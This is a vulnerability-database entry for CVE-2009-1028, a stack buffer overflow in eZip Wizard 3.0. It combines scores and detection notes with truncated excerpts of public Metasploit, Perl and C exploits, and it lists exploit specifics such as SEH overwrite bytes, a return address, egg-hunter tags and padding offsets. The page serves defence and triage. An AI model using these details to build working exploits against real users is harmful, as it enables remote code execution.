CVE-2009-1028
published 2009-03-20CVE-2009-1028: Stack-based buffer overflow in ediSys eZip Wizard 3.0 allows remote attackers to execute arbitrary code via a crafted .zip file.
PriorityP354critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
33.01%
98.1th percentile
Stack-based buffer overflow in ediSys eZip Wizard 3.0 allows remote attackers to execute arbitrary code via a crafted .zip file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| edisys | ezip_wizard | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x61\x61\x7a\x04
bytes↗
\x61\x61\x7a\x04 (nseh) + \x10\x07\x02\x10 (seh)
bytes↗
\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34
bytes↗
w00tw00t (egg tag)
bytes↗
w00tw00t
- →Exploit triggers when a victim double-clicks a file inside the crafted ZIP archive opened with eZip Wizard 3.0; monitor for eZip Wizard spawning unexpected child processes. ↗
- →Crafted ZIP local file header contains the magic bytes 50 4B 03 04 followed by timestamp bytes B7 AC CE 34; detect anomalous ZIP files with this specific timestamp pattern. ↗
- →SEH chain overwrite: look for 0x58585858 / 0x41414141 pattern in SEH chain of eZip Wizard process, as shown in the PoC. ↗
- →The Metasploit module uses AlphanumMixed encoder (x86/alpha_mixed) with BufferRegister=ESP; detect alphanumeric shellcode in ZIP filename fields. ↗
- →Egg-hunter tag 'w00t' (w00tw00t marker) present in ZIP filename or file data field indicates exploitation attempt. ↗
- →The crafted ZIP filename field is padded to ~2500 bytes (\xc4\x09 = 2500 in filename length field); ZIP files with abnormally large filename lengths targeting eZip Wizard should be flagged. ↗
- →The exploit filename inside the ZIP is crafted as 'Admin passwords.txt' padded to 50 bytes before the SEH overwrite; monitor for ZIP entries with this filename pattern. ↗
- ·The SEH return address 0x10020710 is labeled 'Windows Universal' but was tested specifically on XP SP3 EN (VirtualBox); reliability on other Windows versions is not guaranteed. ↗
- ·The junk offset of 50 bytes to reach SEH may require adjustment depending on the USERNAME length supplied; USERNAME >= 9 characters changes the padding calculation. ↗
- ·The Metasploit module adjusts padding based on USERNAME length: if USERNAME length >= 9, padding = Offset - 8; otherwise padding = Offset - USERNAME.length. ↗
- ·Badchars that do not apply to the final payload but must be avoided in the egghunter/SEH overwrite region include null bytes and path separator characters. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
eZip Wizard 3.0 - Local Stack Buffer Overflow (Metasploit)
exploitdb·2011-04-25
CVE-2009-1028 eZip Wizard 3.0 - Local Stack Buffer Overflow (Metasploit)
eZip Wizard 3.0 - Local Stack Buffer Overflow (Metasploit)
---
##
# $Id: ezip_wizard_bof.rb 12428 2011-04-25 01:06:34Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/zip'
class Metasploit3 'eZip Wizard 3.0 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
version 3.0 of ediSys Corp.'s eZip Wizard.
In order for the command to be executed, an attacker must convince someone to
open a specially crafted zip file with eZip Wizard, and access the specially
file via double-clickin
Exploit-DB
eZip Wizard 3.0 - '.zip' File (SEH)
exploitdb·2010-04-04
CVE-2009-1028 eZip Wizard 3.0 - '.zip' File (SEH)
eZip Wizard 3.0 - '.zip' File (SEH)
---
#!/usr/bin/perl
# Software : eZip Wizard 3.0 (.zip)
# Author : Lincoln & corelanc0d3r
# Discovered by : fl0 fl0w
# Reference : http://www.exploit-db.com/exploits/8180
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Greetz to : Corelan Security Team & fl0 fl0w
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
#Double click on file name inside wizard to trigger exploit
#
#
# Code :
print "|-------------------------------------------
Exploit-DB
eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH)
exploitdb·2009-03-09
CVE-2009-1059 eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH)
eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH)
---
/*ezip wizard Local Stack Buffer Overflow (SEH) POC
SEH chain of main thread
Address SE handler
0012FC60 58585858
0012FC60 41414141 AAAA Pointer to next SEH record
Old bug ,still not fixed by vendors ,this kind of file can cause problems to a lot of soft of this kind.
Ex: ZipGenius stack buffer overflow (SEH overwrite)
zip it fast format string buffer overflow
Power zip 7.2 stack buffer overflow
and so on..
*/
#include
#include
#include
char file[] =
{
0x50, 0x4B, 0x03, 0x04, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB7, 0xAC, 0xCE, 0x34, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x08, 0x00, 0x00, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
Metasploit
eZip Wizard 3.0 Stack Buffer Overflow
metasploit
eZip Wizard 3.0 Stack Buffer Overflow
eZip Wizard 3.0 Stack Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in version 3.0 of ediSys Corp.'s eZip Wizard. In order for the command to be executed, an attacker must convince someone to open a specially crafted zip file with eZip Wizard, and access the specially file via double-clicking it. By doing so, an attacker can execute arbitrary code as the victim user.
No writeups or analysis indexed.
http://secunia.com/advisories/39169http://securityreason.com/securityalert/8217http://www.securityfocus.com/bid/34044https://exchange.xforce.ibmcloud.com/vulnerabilities/49148https://www.exploit-db.com/exploits/8180http://secunia.com/advisories/39169http://securityreason.com/securityalert/8217http://www.securityfocus.com/bid/34044https://exchange.xforce.ibmcloud.com/vulnerabilities/49148https://www.exploit-db.com/exploits/8180
2009-03-20
Published